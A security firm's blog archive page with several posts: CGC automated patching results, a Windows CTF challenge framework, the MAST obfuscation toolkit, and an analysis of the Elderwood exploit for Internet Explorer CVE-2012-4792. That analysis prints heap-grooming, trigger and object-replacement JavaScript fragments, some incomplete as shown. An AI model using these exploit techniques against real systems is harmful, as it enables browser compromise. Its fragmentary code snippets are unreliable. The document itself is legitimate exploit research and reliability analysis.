We created two main patching strategies: generic patching and bug-based patching. Generic patching is an exclusion-based strategy: it first assumes that every memory access must be verified, and then excludes accesses that are provably safe. The benefit of generic patching is that it patches all possible invalid memory accesses in a challenge. Bug-based patching is an inclusion-based strategy: it first assumes only one memory access (where the CRS found a bug) must be verified, and then includes nearby accesses that may be unsafe. Each patching strategy has multiple heuristics to determine which accesses should be included or excluded from verification.

The inclusion and exclusion heuristics generate patched challenges with different security/performance tradeoffs. The patched challenges generated by these heuristics were tested for performance and security to determine which heuristic performed best while still fixing the bug. For the qualifying event, we evaluated both generic and bug-based patching, but ultimately chose a generic-only patching strategy. Bug-based patching was slightly more performant, but generic patching was more comprehensive and it patched bugs that our CRS couldn’t find.

Functionality and Performance

Functionality and performance scores combine to create an availability score. The availability score is used as a scaling factor for points gained by patching and bug finding. This scaling factor only matters for successfully patched challenges, since those are the only challenges that can score points. The following graphs only consider functionality and performance of successfully patched challenges.


Out of the 94 challenges that our CRS successfully patched, 56 retained full functionality, 30 retained partial functionality, and 8 were nonfunctional. Of the top 10 teams in the qualifying event, our CRS ranks 5th in terms of fully functional patched challenges (Figure 4). We suspect our patched challenges lost functionality due to problems in mcsema, our x86 to LLVM translator. We hope to verify and address these issues once DARPA open-sources the qualifying event challenges.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.


The performance of patched challenges is how our CRS snatched defeat from the jaws of victory. Of the top ten teams in the qualifying event, our CRS placed last in terms of patched challenge performance (Figure 5).

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.

Our CRS produces slow binaries for two reasons: technical and operational. The technical reason is that performance of our patched challenges is an artifact of our patching process, which translates challenges into LLVM bitcode and then re-emits them as executable binaries. The operational reason is that our patching was developed late and optimized for the wrong performance measurements.

So, why did we optimize for the wrong performance measurements? The official CGC performance measurement tools were kept secret, because the organizers wanted to ensure that no one could cheat by gaming the performance measurements. Therefore, we had to measure performance ourselves, and our metrics showed that CPU overhead of our patched challenges was usually negligible. The main flaw that we observed was that our patched challenges used too much memory. Because of this, we spent time and effort optimizing our patching to use less memory in favor of using more CPU time.

It turns out we optimized for the wrong thing, because our self-measurement did not agree with the official measurement tools (Table 1). When self-measuring, our worst-performing patching method had a median CPU overhead of 33% and a median memory overhead of 69%. The official qualifying event measured us at 76% CPU overhead and 28% memory overhead. Clearly, our self-measurements were considerably different from official measurements.

Measurement Median CPU Overhead Median Memory Overhead
Worst Self-Measured Patching Method 33% 69%
Official Qualifying Event 76% 28%

Table 1: Self measured CPU and memory overhead and the official qualifying event CPU and memory overhead.

Our CRS measured its overall score with our own performance metrics. The self-measured score of our CRS was 106, which would have put us in second place. The real overall score was 21.36, putting us in ninth.

An important aspect of software development is choosing where to focus your efforts, and we chose poorly. CGC participants had access to the official measuring system during two scored events held during the year, one in December 2014 and one in April 2015. We should have evaluated our patching system thoroughly during both scored events. Unfortunately, our patching wasn’t fully operational until after the second scored event, so we had no way to verify the accuracy of our self-measurement. The performance penalty of our patching isn’t a fundamental issue. Had we known how bad it was, we would have fixed it. However, according to our own measurements the patching was acceptable so we focused efforts elsewhere.

What’s Next?

According to the CGC FAQ (Question 46), teams are allowed to combine after the qualifying event. We hope to join forces with another team that qualified for the CGC final event, and use the best of both our technologies to win. The technology behind our CRS will provide a significant advantage to any team that partners with us. If you would like to discuss a potential partnership for the CGC final, please contact us at cgc@trailofbits.com.

If we cannot find a partner for the CGC final, we will focus our efforts on adapting our CRS to automatically find and patch vulnerabilities in real software. Our system is up to the task: it has already proven that it can find bugs, and all of its core components were derived from software that works on real Linux binaries. Several components even have Windows and 64-bit support, and adding support for other platforms is a possibility. If you are interested in commercial applications of our technology, please get in touch with us at cgc@trailofbits.com.

Finally, we plan to contribute back fixes and updates to the open source projects utilized in our CRS. We used numerous open source projects during development, and have made several custom fixes and modifications. We look forward to contributing these back to the community so that everyone benefits from our improvements.

Closing the Windows Gap

The security research community is full of grey beards that earned their stripes writing exploits against mail servers, domain controllers, and TCP/IP stacks. These researchers started writing exploits on platforms like Solaris, IRIX, and BSDi before moving on to Windows exploitation. Now they run companies, write policy, rant on twitter, and testify in front of congress. I’m not one of those people; my education in security started after Windows Vista and then expanded through Capture the Flag competitions when real-world research got harder. Security researchers entering the industry post-20101 learn almost exclusively via Capture the Flags competitions.

Occasionally, I’ll try to talk a grey beard into playing capture the flag. It’s like trying to explain Pokemon to adults. Normally such endeavors are an exercise in futility; however, on a rare occasion they’ll also get excited and agree to try it out! They then get frustrated and stuck on the same problems I do – it’s fantastic for my ego2.

“Ugh, it’s 90s shellcoding problems applied today.”
— muttered during DEFCON 22 CTF Quals

Following a particularly frustrating CTF we were discussing challenges and how there are very few Windows challenges despite Windows being such an important part of our industry. Only the Russian CTFs release Windows challenges; none of the large American CTFs do.

Much like Cold War-era politics, the Russian (CTFs) have edged out a Windows superiority, a Windows gap.

Projected magnitude of the Windows gap

Projected magnitude of the Windows gap

The Windows gap exists outside of CTF as well. Over the past few years the best Windows security research has come out of Russia3 and China. So, why are the Russians and Chinese so good at Windows? Well, because they actually use Windows…and for some reason western security researchers don’t.

Let’s close this Windows gap. Windows knowledge is important for our industry.

Helping the CTF community

If Capture the Flag competitions are how today’s greenhorns cut their teeth, we should have more Windows-based challenges and competitions. To facilitate this, Trail of Bits is releasing AppJailLauncher, a framework for making exploitable Windows challenges!

This man knows Windows and thinks you should too.

This man knows Windows and thinks you should too.

As a contest organizer, securing your infrastructure is the biggest priority and securing Windows services has always been a bit tricky until Windows 8 and the introduction of AppContainers. AppJailLauncher uses AppContainers to keep everything nice and secure from griefers. The repository includes everything you need to isolate a Windows TCP service from the rest of the operating system.

Additionally, we’re releasing the source code to greenhornd, a 2014 CSAW challenge I wrote to introduce people to Windows exploitation and the best debugger yet developed: WinDbg. The repository includes the binary as released, deployment directions, and a proof-of-vulnerability script.

We’re hoping to help drag the CTF community kicking and screaming into Windows expertise.

Windows Reactions

Releasing a Windows challenge last year at CSAW was very entertaining. There was plenty of complaining4:

<dwn> how is this windows challenge only 200 points omg
<dwn> making the vuln obvious doesn’t make windows exploitation any easier ;_;

<mserrano> RyanWithZombies: dude but its fuckin windows
<mserrano> even I don’t use windows anymore
<@RyanWithZombies> i warned you guys for months
<mserrano> also man windows too hard

<geohot> omg windows
<geohot> is so hard
<geohot> will do tomorrow
<geohot> i don’t have windows vm

<ebeip90> zomg a windows challenge
[ hours later ]
<ebeip90> remember that part a long time ago when I said “Oh yay, a Windows challenge”?

<ricky> Windows is hard
<miton> ^

Some praise:

<cai_> i liked your windows one btw:)

<MMavipc> RyanWithZombies pls more windows pwning/rce

<CTFBroforce> I was so confused I have never done a windows exploit
<CTFBroforce> this challenge is going to make me look into windows exploits
<CTFBroforce> I dont know how to write windows shell code

<spq> thx for the help and the force to exploit windows with shellcode for the first time:)

It even caused some arguments among competitors:

<clockish> dudes, shut up, windows is hard
<MMavipc> windows is easy
<MMavipc> linux is hard

We hope AppJailLauncher will be used to elicit more passionate responses over the next few years!

  1. Many of the most popular CTFs started in 2010 and 2011: Ghost in the Shellcode (2010), RuCTFe (2010), PlaidCTF (2011), Codegate (2011), PHDays (2011). Very few predate 2010.
  2. Much like watching geohot fail at format string exploitation during a LiveCTF broadcast: https://www.youtube.com/watch?v=td1KEUhlSuk
  3. Try searching for obscure Windows kernel symbols, you’ll end up on a Russian forum.
  4. The names have not been changed to shame the enablers.

ReMASTering Applications by Obfuscating during Compilation

In this post, we discuss the creation of a novel software obfuscation toolkit, MAST, implemented in the LLVM compiler and suitable for denying program understanding to even the most well-resourced adversary. Our implementation is inspired by effective obfuscation techniques used by nation-state malware and techniques discussed in academic literature. MAST enables software developers to protect applications with technology developed for offense.

MAST is a product of Cyber Fast Track, and we would like to thank Mudge and DARPA for funding our work. This project would not have been possible without their support. MAST is now a commercial product offering of Trail of Bits and companies interested in licensing it for their own use should contact info@trailofbits.com.


There are a lot of risks in releasing software these days. Once upon a time, reverse engineering software presented a challenge best solved by experienced and skilled reverse engineers at great expense. It was worthwhile for reasonably well-funded groups to reverse engineer and recreate proprietary technology or for clever but bored people to generate party tricks. Despite the latter type of people causing all kinds of mild internet havoc, reverse engineering wasn’t widely considered a serious threat until relatively recently.

Over time, however, the stakes have risen; criminal entities, corporations, even nation-states have become extremely interested in software vulnerabilities. These entities seek to either defend their own network, applications, users, or to attack someone else’s. Historically, software obfuscation was a concern of the “good guys”, who were interested in protecting their intellectual property. It wasn’t long before malicious entities began obfuscating their own tools to protect captured tools from analysis.

A recent example of successful obfuscation is that used by the authors of the Gauss malware; several days after discovering the malware, Kaspersky Lab, a respected malware analysis lab and antivirus company, posted a public plea for assistance in decrypting a portion of the code. That even a company of professionals had trouble enough to ask for outside help is telling: obfuscation can be very effective. Professional researchers have been unable to deobfuscate Gauss to this day.


With all of this in mind, we were inspired by Gauss to create a software protection system that leapfrogs available analysis technology. Could we repurpose techniques from software exploitation and malware obfuscation into a state-of-the-art software protection system? Our team is quite familiar with publicly available tools for assisting in reverse engineering tasks and considered how to significantly reduce their efficacy, if not deny it altogether.

Software developers seek to protect varying classes of information within a program. Our system must account for each with equal levels of protection to satisfy these potential use cases:

  • Algorithms: adversary knowledge of proprietary technology
  • Data: knowledge of proprietary data (the company’s or the user’s)
  • Vulnerabilities: knowledge of vulnerabilities within the program

In order for the software protection system to be useful to developers, it must be:

  • Easy to use: the obfuscation should be transparent to our development process, not alter or interfere with it. No annotations should be necessary, though we may want them in certain cases.
  • Cross-platform: the obfuscation should apply uniformly to all applications and frameworks that we use, including mobile or embedded devices that may run on different processor architectures.
  • Protect against state-of-the-art analysis: our obfuscation should leapfrog available static analysis tools and techniques and require novel research advances to see through.

Finally, we assume an attacker will have access to the static program image; many software applications are going to be directly accessible to a dedicated attacker. For example, an attacker interested in a mobile application, anti-virus signatures, or software patches will have the static program image to study.

Our Approach

We decided to focus primarily on preventing static analysis; in this day and age there are a lot of tools that can be run statically over application binaries to gain information with less work and time required by attackers, and many attackers are proficient in generating their own situation-specific tools. Static tools can often very quickly be run over large amounts of code, without necessitating the attacker having an environment in which to execute the target binary.

We decided on a group of techniques that compose together, comprising opaque predicate insertion, code diffusion, and – because our original scope was iOS applications – mangling of Objective-C symbols. These make the protected application impossible to understand without environmental data, impossible to analyze with current static analysis tools due to alias analysis limitations, and deny the effectiveness of breakpoints, method name retrieval scripts, and other common reversing techniques. In combination, these techniques attack a reverse engineer’s workflow and tools from all sides.

Further, we did all of our obfuscation work inside of a compiler (LLVM) because we wanted our technology to be thoroughly baked into the entire program. LLVM can use knowledge of the program to generate realistic opaque predicates or hide diffused code inside of false paths not taken, forcing a reverse engineer to consult the program’s environment (which might not be available) to resolve which instruction sequences are the correct ones. Obfuscating at the compiler level is more reliable than operating on an existing binary: there is no confusion about code vs. data or missing critical application behavior. Additionally, compiler-level obfuscation is transparent to current and future development tools based on LLVM. For instance, MAST could obfuscate Swift on the day of release — directly from the Xcode IDE.

Symbol Mangling

The first and simplest technique was to hinder quick Objective-C method name retrieval scripts; this is certainly the least interesting of the transforms, but would remove a large amount of human-readable information from an iOS application. Without method or other symbol names present for the proprietary code, it’s more difficult to make sense of the program at a glance.

Opaque Predicate Insertion

The second technique we applied, opaque predicate insertion, is not a new technique. It’s been done before in numerous ways, and capable analysts have developed ways around many of the common implementations. We created a stronger version of predicate insertion by inserting predicates with opaque conditions and alternate branches that look realistic to a script or person skimming the code. Realistic predicates significantly slow down a human analyst, and will also slow down tools that operate on program control flow graphs (CFGs) by ballooning the graph to be much larger than the original. Increased CFG size impacts the size of the program and the execution speed but our testing indicates the impact is smaller or consistent with similar tools.

Code Diffusion

The third technique, code diffusion, is by far the most interesting. We took the ideas of Return-Oriented Programming (ROP) and applied them in a defensive manner.

In a straightforward situation, an attacker exploits a vulnerability in an application and supplies their own code for the target to execute (shellcode). However, since the introduction of non-executable data mitigations like DEP and NX, attackers have had to find ways to execute malicious code without the introduction of anything new. ROP is a technique that makes use of code that is already present in the application. Usually, an attacker would compile a set of short “gadgets” in the existing program text that each perform a simple task, and then link those together, jumping from one to the other, to build up the functionality they require for their exploit — effectively creating a new program by jumping around in the existing program.

We transform application code such that it jumps around in a ROP-like way, scrambling the program’s control flow graph into disparate units. However, unlike ROP, where attackers are limited by the gadgets they can find and their ability to predict their location at runtime, we precisely control the placement of gadgets during compilation. For example, we can store gadgets in the bogus programs inserted during the opaque predicate obfuscation. After applying this technique, reverse engineers will immediately notice that the handy graph is gone from tools like IDA. Further, this transformation will make it impossible to use state-of-the-art static analysis tools, like BAP, and impedes dynamic analysis techniques that rely on concrete execution with a debugger. Code diffusion destroys the semantic value of breakpoints, because a single code snippet may be re-used by many different functions and not used by other instances of the same function.

graph view is useful

Native code before obfuscation with MAST

graph view is useless

Native code after obfuscation with MAST

The figures above demonstrate a very simple function before and after the code diffusion transform, using screenshots from IDA. In the first figure, there is a complete control flow graph; in the second, however, the first basic block no longer jumps directly to either of the following blocks; instead, it must refer at runtime to a data section elsewhere in the application before it knows where to jump in either case. Running this code diffusion transform over an entire application reduces the entire program from a set of connected-graph functions to a much larger set of single-basic-block “functions.”

Code diffusion has a noticeable performance impact on whole-program obfuscation. In our testing, we compared the speed of bzip2 before and after our return-oriented transformation and slowdown was approximately 55% (on x86).

Environmental Keying

MAST does one more thing to make reverse engineering even more difficult — it ties the execution of the code to a specific device, such as a user’s mobile phone. While using device-specific characteristics to bind a binary to a device is not new (it is extensively used in DRM and some malware, such as Gauss), MAST is able to integrate device-checking into each obfuscation layer as it is woven through the application. The intertwining of environmental keying and obfuscation renders the program far more resistant to reverse-engineering than some of the more common approaches to device-binding.

Rather than acquiring any copy of the application, an attacker must also acquire and analyze the execution environment of the target computer as well. The whole environment is typically far more challenging to get ahold of, and has a much larger quantity of code to analyze. Even if the environment is captured and time is taken to reverse engineer application details, the results will not be useful against the same application as running on other hosts because every host runs its own keyed version of the binary.


In summary, MAST is a suite of compile-time transformations that provide easy-to-use, cross-platform, state-of-the-art software obfuscation. It can be used for a number of purposes, such as preventing attackers from reverse engineering security-related software patches; protecting your proprietary technology; protecting data within an application; and protecting your application from vulnerability hunters. While originally scoped for iOS applications, the technologies are applicable to any software that can be compiled with LLVM.

Dear DARPA: Challenge Accepted.


We are proud to have one of the only seven accepted funded-track proposals to DARPA’s Cyber Grand Challenge.

Computer security experts from academia, industry and the larger security community have organized themselves into more than 30 teams to compete in DARPA’s Cyber Grand Challenge —- a first-of-its-kind tournament designed to speed the development of automated security systems able to defend against cyberattacks as fast as they are launched. DARPA also announced today that it has reached an agreement to hold the 2016 Cyber Grand Challenge final competition in conjunction with DEF CON, one of the largest computer security conferences in the world.

More info from DARPA:

Press coverage:

Our participation in this program aligns with our development of Javelin, an automated system for simulating attacks against enterprise networks. We have assembled a world-class team of experts in software security, capture the flag, and program analysis to compete in this challenge. As much as we wish the other teams luck in this competition, Trail of Bits is playing to win. Game on!

Introducing Javelin


Javelin shows you how modern attackers would approach and exploit your enterprise. By simulating real-time, real-world attack techniques, Javelin identifies which employees are most likely to be targets of spearphishing campaigns, uncovers security infrastructure weaknesses, and compares overall vulnerability against industry competitors. Javelin benchmarks the efficacy of defensive strategies, and provides customized recommendations for improving security and accelerating threat detection. Highly automated, low touch, and designed for easy adoption, Javelin will harden your existing security and information technology infrastructure.

Read more about Javelin on the Javelin Blog.

Writing Exploits with the Elderwood Kit (Part 2)

In the final part of our three-part series, we investigate the how the toolkit user gained control of program flow and what their strategy means for the reliability of their exploit.

Last time, we talked about how the Elderwood kit does almost everything for the kit user except give them a vulnerability to use. We think it is up to the user to discover a vulnerability, trigger and exploit it, then integrate it with the kit. Our analysis indicates that their knowledge of how to do this is poor and the reliability of the exploit suffered as a result. In the sections that follow, we walk through each section of the exploit that the user had to write on their own.

The Document Object Model (DOM)

The HTML Document Object Model (DOM) is a representation of an HTML page, used for accessing and modifying properties. Browsers provide an interface to the DOM via JavaScript. This interface allows websites to have interactive and dynamically generated content. This interface is very complicated and is subject to many security flaws such as the use-after-free vulnerability used by the attackers in the CFR compromise. For example, the Elderwood group has been responsible for discovering and exploiting at least three prior vulnerabilities of this type in Internet Explorer.

Use-after-Free Vulnerabilities

Use-after-free vulnerabilities occur when a program frees a block and then attempts to use it at some later point in program execution. If, before the block is reused, an attacker is able to allocate new data in its place then they can gain control of program flow.

Exploiting a Use-after-Free

  1. Program allocates and then later frees block A
  2. Attacker allocates block B, reusing the memory previously allocated to block A
  3. Attacker writes data into block B
  4. Program uses freed block A, accessing the data the attacker left there

In order to take advantage of CVE-2012-4792, the exploit allocated and freed a CButton object. While a weak reference to the freed object was maintained elsewhere in Internet Explorer, the exploit overwrote the CButton object with their own data. The exploit then triggered a virtual function call on the CButton object, using the weak reference, resulting in control of program execution.

Prepare the Heap

After 16 allocations of the same size occur, Internet Explorer will switch to using the Low Fragmentation Heap (LFH) for further heap allocations. Since these allocations exist on a different heap, they are not usable for exploitation and have to be ignored. To safely skip over the first 16 allocations, the exploit author creates 3000 string allocations of a similar size to the CButton object by assigning the className property on a div tag.

var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
	arrObject[i] = document.createElement('div');
	arrObject[i].className = unescape("ababababababababababababababababababababa");

The contents of the chosen string, repeated “ab”s,  is not important. What is important is the size of the allocation created by it. The LFH has an 8 byte granularity for allocations less than 256 bytes so allocations between 80 and 88 bytes will be allocated from the same area. Here is an example memory dump of what the string in memory would look like:

00227af8  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b08  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b18  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b28  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b38  61 00 62 00 61 00 62 00-61 00 62 00 61 00 62 00  a.b.a.b.a.b.a.b.
00227b48  61 00 00 00 00 00 00 00-0a 7e a8 ea 00 01 08 ff  a........~......

Then, the exploit author assigns the className of every other div tag to null, thereby freeing the previously created strings when CollectGarbage() is called. This will create holes in the allocated heap memory and creates a predictable pattern of allocations.

for (var i = 0; i < arrObject.length; i += 2) {
	arrObject[i].className = null;

Next, the author creates 500 button elements. As before, they free every other one to create holes and call CollectGarbage() to enable reuse of the allocations.

for (var i = 0; i < elmObject.length; i++) {
	elmObject[i] = document.createElement('button');
for (var i = 1; i < arrObject.length; i += 2) {
	arrObject[i].className = null;

In one of many examples of reused code in the exploit, the JavaScript array used for heap manipulation is called arrObject. This happens to be the variable name given to an example of how to create arrays found on page 70 of the JavaScript Cookbook.

Trigger the Vulnerability

The code below is responsible for creating the use-after-free condition. The applyElement and appendChild calls create the right conditions and new allocations. The free will occur after setting the outerText property on the q tag and then calling CollectGarbage().

try {
	e0 = document.getElementById("a");
	e1 = document.getElementById("b");
	e2 = document.createElement("q");
	e2.outerText = "";
} catch (e) {}

At this point, there is now a pointer to memory that has been freed (a stale pointer). In order to continue with the exploit, the memory it points to must be replaced with attacker-controlled data and then the pointer must be used.

Notably, the vulnerability trigger is the only part of the exploit that is wrapped in a try/catch block. In testing, we confirmed that this try/catch is not a necessary condition for triggering the vulnerability or for successful exploitation. If the author were concerned about unhandled exceptions, they could have wrapped all their code in a try/catch instead of only this part. This condition suggests that the vulnerability trigger is separate from any code the developed wrote on their own and may have been automatically generated.

Further, the vulnerability trigger is the one part of the exploit code that a fuzzer can generate on its own. Such a security testing tool might have wrapped many DOM manipulations in try/catch blocks on every page load to maximize the testing possible without relaunching the browser. Given the number of other unnecessary operations left in the code, it is likely that the output of a fuzzer was pasted into the exploit code and the try/catch it used was left intact.

Replace the Object

To replace the freed CButton object with memory under their control, the attacker consumes 20 allocations from the LFH and then targets the 21st allocation for the replacement. The choice to target the 21st allocation was likely made through observation or experimentation, rather than precise knowledge of heap memory. As we will discuss in the following section, this assumption leads to unreliable behavior from the exploit. If the author had a better understanding of heap operations and changed these few lines of code, the exploit could have been much more effective.

for (var i = 0; i < 20; i++) {
	arrObject[i].className = unescape("ababababababababababababababababababababa");
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

The window.location line has two purposes: it creates a replacement object and triggers the use of the stale pointer. As with most every other heap allocation created for this exploit, the unescape() function is called to create a string. This time it is slightly different. The exploit author uses %u encoding to fully control the first DWORD in the allocation, the vtable of an object.

For the replaced object, the memory will look like this:

19eb1c00  10ab0d0c 00740068 00700074 003a0073  ….h.t.t.p.s.:.
19eb1c10  002f002f 00770077 002e0077 006f0067  /./.w.w.w...g.o.
19eb1c20  0067006f 0065006c 0063002e 006d006f  o.g.l.e...c.o.m.
19eb1c30  0073002f 00740065 00690074 0067006e  /.s.e.t.t.i.n.g.
19eb1c40  002f0073 00630061 006f0063 006e0075  s./.a.c.c.o.u.n.
19eb1c50  00000074 00000061 f0608e93 ff0c0000  t...a.....`.....

When window.location is set, the browser goes to the URL provided in the string. This change of location will free all the allocations created by the current page since they are no longer necessary. This triggers the use of the freed object and this is when the attacker gains control of the browser process. In this case, this causes the browser to load “/[unprintablebytes]https://www.google.com/settings/account” on the current domain. Since this URL does not exist, the iframe loading the exploit on the CFR website will show an error page.

In summary, the exploit overwrites a freed CButton object with data that the attacker controls. In this case, a very fragile technique to overwrite the freed CButton object was used and the exploits fails to reliably gain control of execution on exploited browsers as result. Instead of overwriting a large amount of objects that may have been recently freed, the exploit writers assume that the 21st object they overwrite will always be the correct freed CButton object. This decreases the reliability of the exploit because it assumes a predetermined location of the freed CButton object in the freelist.

Now that the vulnerability can be exploited, it can be integrated with the kit by using the provided address we mentioned in the previous post, 0x10ab0d0c. By transferring control to the SWF loaded at that address, the provided ROP chains and staged payload will be run by the victim.


Contrary to popular belief, it is possible for an exploit to fail even on a platform that it “supports.” Exploits for use-after-frees rely on complex manipulation of the heap to perform controlled memory allocations. Assumptions about the state of memory may be broken by total available memory, previously visited websites, the number of CPUs present, or even changes to software running on the host. Therefore, we consider exploit reliability to be a measure of successful payload execution vs total attempts in these various scenarios.

We simulated real-world use of the Elderwood exploit for CVE-2012-4792 to determine its overall reliability. We built a Windows XP test system with versions of Internet Explorer, Flash and Java required by the exploit. Our testing routine started by going to a random website, selected from several popular websites, and then going to our testing website hosting the exploit. We think this is a close approximation of real-world use since the compromised website is not likely to be anyone’s homepage.

Under these ideal conditions, we determined the reliability of the exploit to be 60% in our testing. Although it is unnecessary to create holes to trigger the vulnerability to exploit it successfully, as described in the previous code snippets, we found that reliability drops to about 50% if these operations are not performed. We describe some of the reasons for such a low reliability below:

  • The reliance on the constant memory address provided by the SWF. If memory allocations occur elsewhere and at this address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0x10000000.
  • The assumption that the 21st object will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, then this assumption will cause the exploit to fail. In this case, the exploit will dereference 0x00410042 from the allocations of the “ab” strings.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability, however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors that should have been exploited were not due to the fragility of the replacement technique.


After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.


Get every new post delivered to your Inbox.

Join 5,754 other followers